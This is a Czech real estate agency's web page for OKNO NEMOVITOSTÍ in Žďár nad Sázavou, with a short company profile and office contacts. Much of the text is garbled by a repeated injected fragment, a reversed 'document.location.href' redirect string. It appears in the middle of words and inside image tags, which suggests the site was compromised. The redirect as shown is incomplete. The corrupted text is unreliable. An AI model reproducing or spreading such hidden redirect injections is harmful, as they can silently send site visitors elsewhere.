Rainbow page separator

OKNO NEMOVITOSTÍ, s.r.o., Realitní kancelář

OKNO NEMOVITOSTÍ, s.r.o., Realitní kancelář Žďár nad Sázavou

OKNO NEMOVITOSTÍ, s.r.o., Realitní kancelář ve Žďáře nad Sázavou

 www.rkokno.cz

[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tosti-realitni-kancelar-zdar-nad-sazavou-realitka-nemovi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tosti-prodej-bytu-prodej-domu.jpg“>[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tosti-realitni-kancelar-zdar-nad-sazavou-realitka-nemovi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tosti-prodej-bytu-prodej-domu.jpg“ alt=“ OKNO NEMOVITOSTÍ, s.r.o., Realitní kancelář Žďár nad Sázavou“ width=“540″ height=“289″>

Jsme realitní kancelář. Pomáháme našim klientům s prodejem i koupí všech typů nemovi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostí již od roku 2008.

Firma nese zodpovědnost za své zaměstnance, všichni pracujeme na hlavní pracovní poměr.

Jsme připraveni Vám poskytnout realitní i právní servis s maximální péčí a kvali[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na všech našich 9 pobočkách stejně.

Společnost budujeme na základech pevné rodinné tradice. Baví nám pomáhat tam, kde je třeba – nejen našim klientům, ale také dlouhodobě podporujeme Dětský domov v Plumlově.

Více informací na  www.rkokno.cz

 

Kontakty:
Jana Vencálková, asistentka kanceláře
OKNO NEMOVITOSTÍ, s.r.o.
Nádražní 432/22
591 01 Žďár nad Sázavou

Tel.: +420 605 221 928
E-mail: zdar@rkokno.cz

Sídlo společnosti:
OKNO NEMOVITOSTÍ, s.r.o.
Kořískova 1344/47
621 00 Brno

Web: www.rkokno.cz

[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tosti-bytu-domu.jpg“>[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tosti-bytu-domu.jpg“ alt=“OKNO NEMOVITOSTÍ, s.r.o., Realitní kancelář Žďár nad Sázavou“ width=“540″ height=“200″>